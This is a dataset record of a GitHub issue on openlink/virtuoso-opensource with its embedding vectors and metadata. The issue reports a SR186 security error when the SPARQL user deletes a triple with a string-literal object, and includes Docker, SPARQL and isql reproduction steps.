0.00736853526905179, 0.008417912758886814, 0.009188727475702763, 0.009005563333630562, 0.015393408946692944 ]
null
null
null
null
null
null
null
null
null
[ "openlink", "virtuoso-opensource" ]
Hi, I get this error on `DELETE DATA` via <http://localhost:8890/sparql>, but only when the triple's object is a `string`: Virtuoso 42000 Error SR186:SECURITY: No permission to execute dpipe DB.DBA.L_O_LOOK_NE with user ID 107, group ID 107 If the triple's object is a `URI`, the triple is deleted without error. ### Steps to reproduce: Using the official Docker image: $ docker run --name virtuoso-7.2.10-official --interactive --tty \ --env DBA_PASSWORD=dba --publish 1111:1111 --publish 8890:8890 \ --volume `pwd`:/database openlink/virtuoso-opensource-7:7.2.10 Granted `SPARQL_UPDATE` and `WebDAV` to user `SPARQL` through Conductor. System Admin > User Accounts > User > SPARQL > Edit User type: SQL/ODBC and WebDAV Account Roles: SPARQL_SELECT, SPARQL_UPDATE Workaround to prevent https://github.com/openlink/virtuoso-opensource/issues/1094: DB.DBA.RDF_DEFAULT_USER_PERMS_SET ('nobody', 7); Insert data: INSERT DATA { GRAPH <http://mu.semte.ch/application> { <http://mu.semte.ch/application/name-as-uri> <http://schema.org/name> <http://mu.semte.ch/application/myname> . <http://mu.semte.ch/application/name-as-string> <http://schema.org/name> "My name" . } } Deleting the triple with the `string` from <http://localhost:8890/sparql> fails: DELETE DATA { GRAPH <http://mu.semte.ch/application> { <http://mu.semte.ch/application/name-as-string> <http://schema.org/name> "My name" . } } Error: Virtuoso 42000 Error SR186:SECURITY: No permission to execute dpipe DB.DBA.L_O_LOOK_NE with user ID 107, group ID 107 SPARQL query: define sql:big-data-const 0 #output-format:text/html define sql:signal-void-variables 1 DELETE DATA { GRAPH <http://mu.semte.ch/application> { <http://mu.semte.ch/application/name-as-string> <http://schema.org/name> "My name" . } } Deleting the triple with the `URI` as object from <http://localhost:8890/sparql> succeeds: DELETE DATA { GRAPH <http://mu.semte.ch/application> { <http://mu.semte.ch/application/name-as-uri> <http://schema.org/name> <http://mu.semte.ch/application/myname> . } } Result: Delete from <http://mu.semte.ch/application>, 1 (or less) triples -- done Deleting the triple with the `string` from `isql` succceeds: SQL> SPARQL DELETE DATA { GRAPH <http://mu.semte.ch/application> { <http://mu.semte.ch/application/name-as-string> <http://schema.org/name> "My name" . } } ; Done. -- 2 msec. SQL> SPARQL SELECT * WHERE { GRAPH <http://mu.semte.ch/application> { ?s <http://schema.org/name> ?o } } ; s o LONG VARCHAR LONG VARCHAR _______________________________________________________________________________ 0 Rows. -- 1 msec. Version: $ docker run openlink/virtuoso-opensource-7:7.2.10 version [openlink/virtuoso-opensource-7:7.2.10-r16-gcf64774-ubuntu] This Docker image is using the following version of Virtuoso: Virtuoso Open Source Edition (Column Store) (multi threaded) Version 7.2.10.3237-pthreads as of Jun 7 2023 (f3d88f16b) Compiled for Linux (x86_64-ubuntu_bionic-linux-gnu) Copyright (C) 1998-2023 OpenLink Software Actually I encountered the error in Virtuoso 7.2.9 also, but that was in downstream Docker image [redpencil/virtuoso:1.1.0](https://hub.docker.com/layers/redpencil/virtuoso/1.1.0/images/sha256-4710c0e3d6877b15e4eedbbbfee875397aacd52691d15806d7e527f1d45cc7ab?context=explore). Did not test the official Docker image for 7.2.9 yet. Just let me know if I need to test anything. Thank you for your help.
User SPARQL cannot delete triple with a string as object (SR186 DB.DBA.L_O_LOOK_NE)
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1152/comments
2
2023-06-28T16:55:30
2023-07-07T14:48:49Z
https://github.com/openlink/virtuoso-opensource/issues/1152
1,779,342,106
1,152
false
This is a GitHub Issue repo:virtuoso-opensource owner:openlink Title : User SPARQL cannot delete triple with a string as object (SR186 DB.DBA.L_O_LOOK_NE) Issue date: --- start body --- Hi, I get this error on `DELETE DATA` via <http://localhost:8890/sparql>, but only when the triple's object is a `string`: Virtuoso 42000 Error SR186:SECURITY: No permission to execute dpipe DB.DBA.L_O_LOOK_NE with user ID 107, group ID 107 If the triple's object is a `URI`, the triple is deleted without error. ### Steps to reproduce: Using the official Docker image: $ docker run --name virtuoso-7.2.10-official --interactive --tty \ --env DBA_PASSWORD=dba --publish 1111:1111 --publish 8890:8890 \ --volume `pwd`:/database openlink/virtuoso-opensource-7:7.2.10 Granted `SPARQL_UPDATE` and `WebDAV` to user `SPARQL` through Conductor. System Admin > User Accounts > User > SPARQL > Edit User type: SQL/ODBC and WebDAV Account Roles: SPARQL_SELECT, SPARQL_UPDATE Workaround to prevent https://github.com/openlink/virtuoso-opensource/issues/1094: DB.DBA.RDF_DEFAULT_USER_PERMS_SET ('nobody', 7); Insert data: INSERT DATA { GRAPH <http://mu.semte.ch/application> { <http://mu.semte.ch/application/name-as-uri> <http://schema.org/name> <http://mu.semte.ch/application/myname> . <http://mu.semte.ch/application/name-as-string> <http://schema.org/name> "My name" . } } Deleting the triple with the `string` from <http://localhost:8890/sparql> fails: DELETE DATA { GRAPH <http://mu.semte.ch/application> { <http://mu.semte.ch/application/name-as-string> <http://schema.org/name> "My name" . } } Error: Virtuoso 42000 Error SR186:SECURITY: No permission to execute dpipe DB.DBA.L_O_LOOK_NE with user ID 107, group ID 107 SPARQL query: define sql:big-data-const 0 #output-format:text/html define sql:signal-void-variables 1 DELETE DATA { GRAPH <http://mu.semte.ch/application> { <http://mu.semte.ch/application/name-as-string> <http://schema.org/name> "My name" . } } Deleting the triple with the `URI` as object from <http://localhost:8890/sparql> succeeds: DELETE DATA { GRAPH <http://mu.semte.ch/application> { <http://mu.semte.ch/application/name-as-uri> <http://schema.org/name> <http://mu.semte.ch/application/myname> . } } Result: Delete from <http://mu.semte.ch/application>, 1 (or less) triples -- done Deleting the triple with the `string` from `isql` succceeds: SQL> SPARQL DELETE DATA { GRAPH <http://mu.semte.ch/application> { <http://mu.semte.ch/application/name-as-string> <http://schema.org/name> "My name" . } } ; Done. -- 2 msec. SQL> SPARQL SELECT * WHERE { GRAPH <http://mu.semte.ch/application> { ?s <http://schema.org/name> ?o } } ; s o LONG VARCHAR LONG VARCHAR _______________________________________________________________________________ 0 Rows. -- 1 msec. Version: $ docker run openlink/virtuoso-opensource-7:7.2.10 version [openlink/virtuoso-opensource-7:7.2.10-r16-gcf64774-ubuntu] This Docker image is using the following version of Virtuoso: Virtuoso Open Source Edition (Column Store) (multi threaded) Version 7.2.10.3237-pthreads as of Jun 7 2023 (f3d88f16b) Compiled for Linux (x86_64-ubuntu_bionic-linux-gnu) Copyright (C) 1998-2023 OpenLink Software Actually I encountered the error in Virtuoso 7.2.9 also, but that was in downstream Docker image [redpencil/virtuoso:1.1.0](https://hub.docker.com/layers/redpencil/virtuoso/1.1.0/images/sha256-4710c0e3d6877b15e4eedbbbfee875397aacd52691d15806d7e527f1d45cc7ab?context=explore). Did not test the official Docker image for 7.2.9 yet. Just let me know if I need to test anything. Thank you for your help. --- end body ---
4,110
[ -0.012142473831772804, -0.019466891884803772, -0.014024273492395878, 0.018980219960212708, 0.02287359908223152, 0.012288475409150124, 0.0005596731789410114, 0.0073609184473752975, 0.010390453971922398, 0.018639549612998962, 0.021754251793026924, 0.011874804273247719, 0.012685924768447876, -0.012734591960906982, -0.03646797686815262, 0.05509130656719208, -0.04428717866539955, -0.003725070971995592, -0.03458618000149727, -0.03984224051237106, 0.011996472254395485, 0.026361417025327682, -0.03155258670449257, 0.03828488662838936, -0.007912480272352695, 0.025615185499191284, -0.006424074526876211, 0.03945290297269821, -0.030092570930719376, 0.015346400439739227, -0.007117582485079765, 0.028502775356173515, 0.016092630103230476, 0.03867422789335251, 0.053014837205410004, -0.007267639972269535, -0.005568342283368111, 0.036305755376815796, 0.005239838734269142, 0.027805211022496223, -0.043638285249471664, -0.010568900033831596, -0.031163251027464867, 0.05236594006419182, -0.006063126027584076, 0.024187613278627396, -0.013561935164034367, -0.004408440086990595, -0.05742733180522919, 0.017536425963044167, 0.007287917658686638, -0.030790135264396667, -0.022435592487454414, -0.06200205162167549, -0.012385809794068336, -0.05492908135056496, 0.0009642195072956383, 0.023295382037758827, -0.022127367556095123, 0.012815704569220543, -0.011712579987943172, -0.011039350181818008, 0.029459897428750992, 0.01961289346218109, -0.005511563736945391, 0.033872392028570175, -0.004647720605134964, 0.02777276560664177, -0.023636052384972572, -0.005819789599627256, -0.0021616362500935793, 0.007129749283194542, 0.023198045790195465, 0.0017824373207986355, 0.02066734991967678, 0.0017753400607034564, 0.0047004432417452335, 0.008824991062283516, -0.01747153513133526, 0.0014813088346272707, -0.014486612752079964, -0.006801245268434286, -0.021819142624735832, 0.00048819315270520747, 0.02952478639781475, -0.01070679072290659, -0.03737643361091614, -0.0636242926120758, 0.03210414946079254, -0.027496986091136932, -0.010033560916781425, -0.0030761745292693377, 0.0008121344144456089, -0.051133036613464355, -0.013886382803320885, -0.008532987907528877, 0.0018209655536338687, -0.02520962618291378, -0.017812207341194153, 0.03199059143662453, -0.026620974764227867, -0.01161524560302496, -0.0007092235027812421, 0.01176935900002718, 0.017309311777353287, -0.015192287042737007, -0.0037595436442643404, -0.008419430814683437, 0.024398505687713623, 0.1596285104751587, 0.033645279705524445, 0.004688276443630457, -0.018753105774521828, 0.008573544211685658, -0.007251417264342308, -0.048180557787418365, 0.010212006978690624, 0.005836012307554483, 0.01321315299719572, 0.017503980547189713, -0.03212037310004234, -0.02929767221212387, 0.005475063342601061, -0.026977868750691414, -0.03286660462617874, -0.004651776049286127, -0.026377638801932335, -0.007454197388142347, -0.01597907394170761, -0.013237486593425274, -0.050062358379364014, -0.04266493767499924, -0.04882945492863655, -0.00768131110817194, 0.008459987118840218, 0.028664998710155487, -0.023327825590968132, 0.0043070497922599316, -0.03815510869026184, 0.013553823344409466, -0.06271583586931229, -0.03393728286027908, -0.03140658512711525, -0.0023116935044527054, -0.005239838734269142, 0.018444880843162537, -0.014940840192139149, 0.00874387938529253, 0.009944337420165539, -0.008678989484906197, 0.004745054990053177, -0.00482616713270545, 0.03203925862908363, 0.03916089981794357, 0.006776911672204733, 0.0004040393978357315, 0.0037372377701103687, -0.0006483894539996982, -0.023441383615136147, 0.0038852673023939133, -0.031130805611610413, -0.047336991876363754, -0.019256001338362694, -0.023895610123872757, -0.015346400439739227, 0.02029423601925373, -0.0020328708924353123, 0.031082138419151306, -0.015841184183955193, 0.021770475432276726, -0.04964057356119156, 0.010139006190001965, 0.007847591303288937, -0.011899137869477272, -0.013991829007863998, -0.01945067010819912, -0.009863225743174553, -0.018785551190376282, 0.0017428952269256115, -0.03578663617372513, -0.02074846252799034, 0.04269738495349884, -0.0401342436671257, 0.006647132802754641, 0.03202303871512413, -0.00679313438013196, 0.021997587755322456, 0.02491762302815914, 0.004830222576856613, -0.04558497294783592, -0.01769864931702614, 0.028291882947087288, 0.01143679954111576, -0.012945483438670635, -0.03413195163011551, 0.021689362823963165, -0.012507478706538677, -0.024106502532958984, 0.012612923979759216, -0.03942045569419861, 0.033191051334142685, -0.057102885097265244, 0.003321538446471095, 0.004562553018331528, -0.015508623793721199, 0.026685865595936775, -0.00558456452563405, 0.0027334762271493673, 0.007604254875332117, -0.03714932128787041, -0.033483054488897324, -0.0027760600205510855, 0.03231504186987877, 0.007393363397568464, -0.022906042635440826, 0.024203836917877197, -0.025112291797995567, -0.011461133137345314, -0.04668809846043587, -0.0189315527677536, 0.027075203135609627, -0.029184116050601006, -0.051587264984846115, -0.012969817034900188, -0.026312749832868576, -0.017893318086862564, -0.041075143963098526, -0.005097892601042986, -0.01984000764787197, 0.01967778429389, 0.0802035927772522, 0.014316276647150517, 0.005114114843308926, 0.0005799511563964188, 0.01037423126399517, -0.00004591068864101544, -0.014178386889398098, -0.006091515067964792, -0.037051983177661896, 0.000529256125446409, 0.0014387250412255526, 0.011201574467122555, 0.03130925074219704, 0.0042462158016860485, -0.009076438844203949, 0.04172403737902641, -0.007957092486321926, -0.015468068420886993, 0.04759655147790909, 0.023506272584199905, -0.0049762241542339325, -0.023830721154808998, 0.014989507384598255, 0.011599022895097733, 0.003733182093128562, 0.01547617930918932, -0.010001115500926971, 0.004250271711498499, -0.014170275069773197, -0.01846110261976719, 0.031974371522665024, 0.022143589332699776, -0.027042757719755173, 0.04230804741382599, 0.02905433624982834, -0.0001855438167694956, -0.02733476087450981, -0.01565462537109852, 0.007121637929230928, -0.024268725886940956, 0.002589502139016986, 0.016514413058757782, -0.04821300506591797, -0.002392805414274335, -0.01566273719072342, -0.02452828362584114, -0.013610602356493473, -0.01717953197658062, 0.012101918458938599, -0.0006139168399386108, -0.017601314932107925, -0.010796014219522476, -0.04610408842563629, 0.030563021078705788, 0.029995236545801163, 0.022062478587031364, -0.008224762044847012, -0.012483145110309124, -0.0010199840180575848, -0.016822639852762222, -0.025339404121041298, -0.022614039480686188, -0.017520202323794365, 0.01275081466883421, -0.004611220210790634, 0.019856229424476624, 0.018785551190376282, 0.009417109191417694, -0.0008212595130316913, -0.0073163071647286415, -0.004209715407341719, -0.01945067010819912, 0.00833020731806755, 0.038641780614852905, -0.04383295401930809, 0.0056778434664011, -0.001501586870290339, 0.03685731440782547, -0.009928114712238312, -0.010139006190001965, 0.013675492256879807, 0.01271025836467743, -0.012466922402381897, -0.019791340455412865, 0.0033661501947790384, 0.009774002246558666, 0.0302872397005558, 0.021932698786258698, -0.006943191401660442, 0.03624086454510689, -0.0030072294175624847, -0.009214328601956367, -0.0900668203830719, -0.0025773353409022093, 0.057654447853565216, 0.0035202631261199713, -0.04399517551064491, -0.004152936860918999, -0.042956940829753876, -0.006144237704575062, -0.006156404502689838, -0.011234018951654434, 0.014202720485627651, 0.03338572010397911, -0.022646484896540642, -0.07072971016168594, -0.03262326866388321, -0.02884344570338726, 0.014243275858461857, -0.018363768234848976, -0.011517911218106747, 0.027123870328068733, -0.008541098795831203, -0.007819201797246933, 0.05661621317267418, 0.024057835340499878, 0.027805211022496223, 0.020602460950613022, 0.011850470677018166, 0.029946569353342056, 0.0016100741922855377, 0.02095935493707657, -0.004315161146223545, 0.0043070497922599316, 0.04688276723027229, -0.021105356514453888, -0.010763568803668022, -0.02384694293141365, 0.007900313474237919, 0.006801245268434286, 0.03572174906730652, -0.02657230757176876, -0.006931024603545666, 0.0005464924615807831, -0.00327489897608757, 0.006537631154060364, 0.011371909640729427, 0.02529073692858219, 0.0032850380521267653, -0.022841153666377068, -0.026442529633641243, -0.0272374264895916, -0.003392511513084173, -0.016773972660303116, -0.04185381904244423, -0.015727626159787178, 0.04101025313138962, 0.01998600922524929, 0.014948951080441475, 0.020164456218481064, 0.028275661170482635, -0.015727626159787178, 0.008784434758126736, -0.007020248100161552, -0.018493548035621643, 0.01816909946501255, 0.003528374247252941, 0.04587697610259056, 0.024333614856004715, -0.035689301788806915, -0.006213183049112558, 0.04130225628614426, -0.03903111815452576, -0.06755011528730392, 0.002816616091877222, 0.009335997514426708, 0.03809021785855293, -0.03435906395316124, 0.01621429994702339, -0.017309311777353287, 0.024236280471086502, -0.03241237625479698, 0.007105415686964989, -0.011550355702638626, 0.016757749021053314, 0.013018484227359295, 0.0056778434664011, -0.03922578692436218, 0.05444240942597389, 0.0006073265103623271, 0.008074704557657242, 0.02890833467245102, -0.009392775595188141, 0.006172627210617065, 0.019466891884803772, 0.02710764668881893, 0.026669641956686974, -0.01589796133339405, -0.017244422808289528, 0.022743819281458855, -0.0005743746878579259, -0.00991189293563366, -0.005657565779983997, 0.03419684246182442, 0.020634906366467476, 0.0027152260299772024, 0.0033093716483563185, 0.0037047930527478456, 0.04380050674080849, -0.025566518306732178, -0.003118758322671056, 0.023668495938181877, 0.007640755269676447, 0.002206247765570879, -0.03163370117545128, -0.01951555907726288, -0.014251387678086758, -0.0037210152950137854, 0.021981365978717804, 0.0158898513764143, 0.007555587682873011, -0.045292969793081284, -0.022192256525158882, 0.006529520265758038, -0.003893378423526883, 0.0005137941334396601, -0.042437825351953506, -0.04133469983935356, -0.010731124319136143, 0.006286183837801218, -0.0028226994909346104, 0.028097214177250862, -0.027967434376478195, -0.008719545789062977, -0.00475316634401679, -0.0026929201558232307, 0.017211977392435074, -0.005495341494679451, 0.015021951869130135, 0.00866276677697897, -0.061353154480457306, 0.04373561963438988, -0.005089781247079372, -0.021835364401340485, 0.029492340981960297, 0.016611747443675995, -0.021364914253354073, -0.028356773778796196, -0.0002027801238000393, -0.01650630310177803, -0.0017611454240977764, 0.014843505807220936, -0.009920003823935986, 0.014827283099293709, -0.016384635120630264, 0.07780268043279648, 0.02422005869448185, 0.014689392410218716, -0.014981395564973354, 0.02248426154255867, -0.014510946348309517, -0.003199870465323329, 0.020310457795858383, 0.019775118678808212, 0.018039319664239883, -0.010033560916781425, -0.0014894200721755624, -0.004063713829964399, -0.016108853742480278, -0.04756410792469978, 0.02475539781153202, 0.027594320476055145, -0.07929514348506927, 0.0055034528486430645, -0.003560818964615464, 0.008541098795831203, -0.03760354593396187, 0.016003407537937164, 0.006269961595535278, -0.0057224552147090435, 0.041367147117853165, -0.014016162604093552, -0.01237769890576601, -0.0035060683730989695, 0.029476119205355644, -0.020862018689513206, -0.0378631055355072, 0.041594259440898895, -0.0022914153523743153, 0.014997618272900581, 0.04071824997663498, -0.029849234968423843, -0.02240314893424511, -0.0166604146361351, -0.016230521723628044, -0.009076438844203949, 0.011420576833188534, 0.005065447650849819, 0.032525934278964996, 0.010057894513010979, -0.021770475432276726, -0.014997618272900581, -0.05236594006419182, 0.011534133926033974, -0.0018179238541051745, 0.04925123602151871, 0.0227113738656044, -0.004972168710082769, -0.03594886139035225, 0.00239483336918056, -0.010869015008211136, -0.004071825183928013, 0.01128268614411354, 0.02490139938890934, -0.013205042108893394, 0.03270437940955162, 0.006703910883516073, 0.010268785990774632, -0.008001703768968582, 0.0035080963280051947, 0.006724189035594463, 0.06307273358106613, -0.030936136841773987, -0.006484908517450094, 0.049932580441236496, 0.03338572010397911, -0.00564134307205677, 0.013805271126329899, 0.0016496162861585617, -0.00578734464943409, -0.017893318086862564, 0.004448995925486088, -0.013967495411634445, -0.02073224075138569, 0.015524846501648426, -0.014884061180055141, 0.021316247060894966, 0.03231504186987877, 0.014583947136998177, -0.0011375965550541878, 0.0008146691834554076, -0.010017338208854198, -0.018055543303489685, -0.013918828219175339, -0.003027507336810231, -0.027383428066968918, 0.009457665495574474, -0.0015289621660485864, -0.02610185742378235, 0.0040677692741155624, 0.02173803001642227, -0.005617009475827217, -0.023262936621904373, -0.03184458985924721, 0.007044581696391106, -0.0036155697889626026, 0.01139624323695898, 0.007206805981695652, -0.02671830914914608, 0.02582607790827751, -0.007032414898276329, -0.03604619577527046, -0.02739965170621872, 0.01936955749988556, 0.007490697782486677, 0.01847732439637184, 0.016262967139482498, 0.0021839418914169073, 0.00043623073725029826, -0.01452716812491417, 0.003489845898002386, 0.019174888730049133, 0.014705615118145943, -0.0136187132447958, 0.0013819466112181544, 0.02042401395738125, 0.00014955033839214593, 0.0014164191670715809, 0.023976722732186317, -0.01544373482465744, -0.028648776933550835, 0.006103681866079569, 0.005260116420686245, -0.014746170490980148, -0.020115789026021957, -0.017276866361498833, -0.023052044212818146, -0.029411230236291885, -0.007178416475653648, 0.01734175719320774, 0.011242130771279335, 0.007072970736771822, 0.03309371694922447, -0.02853521890938282, 0.03504040464758873, 0.0013697798131033778, 0.02550162933766842, 0.014965173788368702, 0.004461162723600864, 0.023863164708018303, -0.0025692242197692394, -0.05762200057506561, 0.03207170590758324, -0.02791876718401909, 0.004854556173086166, 0.010650012642145157, -0.00115483277477324, 0.01373227033764124, -0.008792546577751637, -0.007202750071883202, -0.029622120782732964, 0.02451206184923649, -0.011128573678433895, -0.037116874009370804, -0.02196514420211315, 0.019061332568526268, 0.032509710639715195, -0.0019213417544960976, -0.002966673346236348, -0.004562553018331528, 0.015322066843509674, 0.03821999952197075, 0.020002231001853943, 0.016773972660303116, -0.0332883857190609, 0.02337649278342724, 0.004254327155649662, 0.026020746678113937, 0.011866693384945393, 0.02520962618291378, -0.011347576044499874, 0.014446056447923183, 0.044838741421699524, 0.007482586894184351, 0.035299964249134064, -0.0363381989300251, 0.03851200267672539, 0.029654566198587418, -0.011745025403797626, 0.02822699397802353, -0.011858581565320492, 0.0017398535273969173, -0.0212026908993721, -0.00681341253221035, 0.007162194233387709, -0.012393921613693237, 0.01067434623837471, 0.007381196599453688, 0.020342903211712837, 0.04808322340250015, -0.012775148265063763, -0.018509769812226295, -0.01726064458489418, -0.008881770074367523, -0.01658741384744644, -0.0174066461622715, -0.02731853909790516, 0.0007163208210840821, -0.005296616815030575, 0.014113496989011765, -0.03041701950132847, 0.003662209026515484, -0.0010777764255180955, -0.007101360242813826, 0.0018189377151429653, -0.00033306636032648385, -0.02021312341094017, 0.011209685355424881, -0.02353871800005436, -0.06125582009553909, 0.011371909640729427, -0.0056616212241351604, 0.030368352308869362, 0.03520262986421585, 0.04130225628614426, -0.009822669439017773, 0.018866663798689842, -0.007640755269676447, -0.016027741134166718, -0.009806446731090546, -0.026977868750691414, 0.001998398220166564, 0.013837715610861778, -0.004294882994145155, 0.014202720485627651, 0.006448408123105764, 0.0073568630032241344, 0.007275750860571861, -0.0038812116254121065, 0.00675663398578763, 0.006525464355945587, -0.00787192489951849, -0.01847732439637184, 0.01967778429389, -0.012028917670249939, 0.02657230757176876, 0.026247859001159668, 0.0006691744201816618, 0.0015279483050107956, 0.0031491753179579973, -0.01672530546784401, -0.001973050646483898, 0.012166807428002357, -0.01779598370194435, -0.020375346764922142, -0.03006012551486492, 0.0057832892052829266, 0.014032385312020779, 0.010398564860224724, 0.017909541726112366, -0.0028186438139528036, -0.006882357411086559, 0.07994403690099716, -0.004169159568846226, -0.03351549804210663, 0.0016242688288912177, 0.028551442548632622, -0.028875891119241714, 0.010739235207438469, -0.006265906151384115, -0.005284450016915798, -0.0012095834827050567, -0.005888734944164753, -0.0023644163738936186, 0.009473887272179127, 0.004173215012997389, 0.0096523342654109, -0.01680641621351242, -0.023279158398509026, 0.010771680623292923, 0.03497551754117012, -0.0136187132447958, 0.03491062670946121, -0.03468351438641548, -0.0029950623866170645, -0.007677255664020777, -0.0028003936167806387, 0.005325006321072578, 0.026620974764227867, -0.02324671298265457, 0.003798071760684252, 0.02224092371761799, -0.006168571300804615, 0.020634906366467476, 0.016384635120630264, -0.010958238504827023, -0.002052134834229946, -0.011526022106409073, 0.023181824013590813, -0.02314937859773636, 0.008370763622224331, -0.021851586177945137, 0.025858521461486816, -0.02256537228822708, 0.012645368464291096, -0.0212026908993721, -0.02105668932199478, 0.009368441998958588, -0.036305755376815796, 0.010552678257226944, -0.03126058354973793, 0.006578187458217144, -0.031390365213155746, 0.006205071695148945, 0.006533575709909201, -0.019434448331594467, 0.006022569723427296, 0.005596731323748827, -0.013740381225943565, -0.01252370048314333, -0.019028887152671814, -0.00582790095359087, 0.00949822086840868, 0.01619807630777359, 0.01430816575884819, -0.013115818612277508, -0.01574384979903698, 0.0011568606132641435, -0.028097214177250862, -0.009709112346172333, -0.00923866219818592, -0.02694542333483696, 0.0010838598245754838, 0.005775177851319313, -0.018590882420539856, -0.0012004583841189742, 0.006618743296712637, 0.008046315051615238, -0.026783199980854988, 0.004558497108519077, 0.03594886139035225, 0.0009429276105947793, -0.03601375222206116, 0.02105668932199478, 0.005361506715416908, 0.005320950411260128, 0.007486642338335514, 0.005337173119187355, 0.019028887152671814, 0.019272223114967346, -0.007227083668112755, 0.01717953197658062, 0.021754251793026924, -0.04626631364226341, -0.04285960644483566, 0.029849234968423843, -0.009741557762026787, -0.002816616091877222, 0.013748493045568466, 0.023960499092936516, 0.03685731440782547, 0.007320362608879805, -0.00667957728728652, -0.024771619588136673, -0.02566385269165039, 0.03164992108941078, 0.022305814549326897, -0.010228229686617851, 0.01627107709646225, 0.04016668722033501, 0.006302406545728445, 0.0068620797246694565, 0.02263026311993599, -0.012183030135929585, 0.013156374916434288, -0.013634935952723026, -0.036370642483234406, 0.02610185742378235, -0.02324671298265457, 0.02157580479979515, 0.01816909946501255, -0.016838861629366875, -0.02196514420211315, 0.047726329416036606, -0.015159842558205128, -0.009887559339404106, 0.005203337874263525, 0.029395006597042084, -0.006026625633239746, -0.008468098007142544, 0.02142980322241783, 0.005580509081482887, -0.006935080513358116, -0.000021149333406356163, 0.011988361366093159, 0.01763376034796238, 0.01423516497015953, -0.047953445464372635, 0.012669702060520649, -0.009473887272179127, -0.01984000764787197, -0.030173683539032936, -0.004647720605134964, 0.004570663906633854, 0.020488904789090157, 0.021819142624735832, -0.011339465156197548, -0.018509769812226295, -0.010074117220938206, 0.0035121517721563578, -0.014291943050920963, -0.006634966004639864, -0.03422928601503372, 0.007543420884758234, 0.01529773324728012, -0.004887001123279333, -0.004165103659033775, -0.04344361647963524, -0.0031877036672085524, 0.009279218502342701, -0.009076438844203949, 0.005961735732853413, -0.044092509895563126, 0.0020825518295168877, -0.01870443858206272, 0.022678930312395096, -0.03650042414665222, -0.01157468929886818, -0.01695241779088974, -0.02822699397802353, 0.002741587348282337, -0.011988361366093159, -0.013424044474959373, 0.0021231079008430243, -0.006071236915886402, -0.0033803447149693966, 0.00858976598829031, 0.005925235338509083, 0.02490139938890934, 0.013164485804736614, 0.023408938199281693, -0.0003470075025688857, -0.00979833584278822, -0.010966349393129349, -0.011550355702638626, -0.023636052384972572, -0.024187613278627396, 0.002333999378606677, -0.005479119252413511, -0.004335439298301935, -0.009984893724322319, 0.02104046568274498, -0.021754251793026924, 0.018590882420539856, 0.013553823344409466, -0.024771619588136673, -0.02808099240064621, 0.013886382803320885, -0.012694035656750202, 0.015249066054821014, 0.010276896879076958, -0.012199252843856812, -0.015768183395266533, 0.005089781247079372, 0.015005729161202908, 0.002820671536028385, 0.000834947160910815, 0.016335967928171158, -0.008435653522610664, -0.019694006070494652, -0.03126058354973793, 0.020229345187544823, -0.0014052663464099169, -0.039485346525907516, -0.003903517499566078, 0.01649007946252823, 0.023327825590968132, -0.004400328733026981, -0.0073609184473752975, -0.011550355702638626, -0.03533240780234337, -0.0012815704103559256, 0.018493548035621643, -0.01165580190718174, -0.019548004493117332, -0.017503980547189713, -0.04308672249317169, 0.012758925557136536, -0.0023725274950265884, 0.00969289056956768, -0.030838802456855774, -0.0005150615470483899, 0.001866591046564281, 0.010171451605856419, -0.02610185742378235, 0.03229881823062897, -0.005876568146049976, 0.005430452059954405, -0.03747376799583435, 0.006890468765050173, -0.024950066581368446, 0.041594259440898895, 0.006367295980453491, 0.02029423601925373, -0.01150168851017952, -0.011955915950238705, -0.006403796374797821, -0.014024273492395878, 0.009514443576335907, 0.022159812971949577, 0.008857435546815395, -0.03903111815452576, 0.012758925557136536, 0.025858521461486816, 0.013789048418402672, -0.008824991062283516, 0.01831510104238987, 0.04509830102324486, -0.01837999001145363, -0.009879447519779205, 0.02618297003209591, -0.00893043726682663, -0.010901459492743015, 0.012953594326972961, 0.03809021785855293, -0.002313721226528287, 0.008532987907528877, -0.013748493045568466, -0.013497045263648033, 0.0005890762549825013, -0.0019760923460125923, -0.008232872933149338, 0.013456488959491253, 0.013716047629714012, 0.03187703713774681, 0.030790135264396667, -0.010187673382461071, -0.02376583032310009, -0.001283598248846829, 0.007068915292620659, -0.02360360696911812, -0.00042000834946520627, 0.03275304660201073, -0.010974460281431675, -0.026815643534064293, -0.03974490612745285, -0.006926969159394503, -0.006476797163486481, 0.009668556973338127, 0.009774002246558666, -0.033353276550769806, 0.005393951199948788, -0.013351043686270714, -0.026977868750691414, 0.011639579199254513, 0.02052134834229946, 0.0036480145063251257, 0.013983717188239098, -0.013237486593425274, 0.010106561705470085, 0.007060803938657045, 0.0010838598245754838, 0.007782701402902603, -0.009563110768795013, -0.016522524878382683, -0.030627910047769547, -0.009790224954485893, -0.03763599321246147, -0.04058847203850746, 0.00195885612629354, 0.039096008986234665, -0.013351043686270714, 0.011566578410565853, 0.014689392410218716, 0.0004985856357961893, 0.0047004432417452335, 0.011412465944886208, 0.030449464917182922, 0.015938518568873405, -0.026523640379309654, 0.028551442548632622, 0.0008521834970451891, 0.040458690375089645, -0.0008075718651525676, -0.008180150762200356, 0.0016191992908716202, -0.007060803938657045, -0.018428657203912735, 0.022419370710849762, 0.031666144728660583, 0.004278660751879215, -0.01717953197658062, 0.003021423937752843, -0.011939694173634052, 0.00783136859536171, -0.025242069736123085, -0.010925793088972569, -0.0000014099555301072542, 0.009262995794415474, 0.007510975934565067, 0.042048487812280655, 0.03721420839428902, 0.01961289346218109, -0.02224092371761799, -0.007802979554980993, -0.00957122165709734, 0.021381136029958725, 0.004651776049286127, 0.004781555384397507, -0.00039846295840106905, 0.013480822555720806, -0.015346400439739227, 0.004013018682599068, 0.03439151123166084, -0.02673453278839588, 0.000779689580667764, 0.008459987118840218, -0.0208295751363039, -0.00467610964551568, -0.01263725757598877, 0.005345284007489681, 0.001068651326932013, 0.007097304333001375, -0.0015107119688764215, 0.0030417018570005894, -0.014843505807220936, 0.029719455167651176, 0.09681534767150879, 0.008541098795831203, -0.005170893389731646, 0.0025834187399595976, -0.022289590910077095, -0.016741527244448662, 0.006529520265758038, -0.028632553294301033, 0.019937342032790184, -0.022224701941013336, 0.011680135503411293, 0.0023076378274708986, 0.019937342032790184, 0.019207334145903587, -0.004457107279449701, -0.012856259942054749, -0.005669732578098774, 0.0024982511531561613, 0.034164395183324814, 0.0022569429129362106, 0.00035435828613117337, 0.013342932797968388, -0.0017499924870207906, -0.016254855319857597, 0.014648836106061935, -0.010763568803668022, 0.0040495190769433975, -0.02853521890938282, 0.0004017581231892109, 0.007567754480987787, -0.012329031713306904, -0.024495840072631836, -0.015249066054821014, -0.00019733041699510068, 0.014016162604093552, 0.00787192489951849, 0.004895112477242947, 0.012215474620461464, -0.007802979554980993, 0.014072940684854984, -0.010325564071536064, 0.007336584851145744, -0.009262995794415474, 0.01831510104238987, 